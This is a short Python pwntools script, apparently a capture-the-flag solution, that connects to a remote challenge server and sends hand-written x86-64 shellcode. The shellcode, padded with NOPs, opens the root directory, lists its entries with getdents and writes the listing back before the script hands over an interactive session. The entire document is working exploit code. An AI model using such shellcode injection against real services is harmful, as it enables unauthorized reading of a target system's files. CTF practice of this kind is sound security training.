#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./universe", checksec=False)
# r = process()
r = remote("challenge.bugpwn.com", 1004)

# openat + getdents + write
shellcode="""
mov r9, [rsp]
sub r9, 0x1370
add r9, 0x4500
mov r15, 0x2f
push r15
lea rsi, [rsp]
cqo
xor r10, r10
add ax, 257
syscall
mov edi, eax
mov al, 78
mov rsi, r9
mov dx, 1000
syscall
mov edi, 1
mov eax, 1
syscall
"""
shellcode = asm(shellcode)
shellcode += b"\x90"*(4096-len(shellcode))
r.sendline(shellcode)

r.interactive()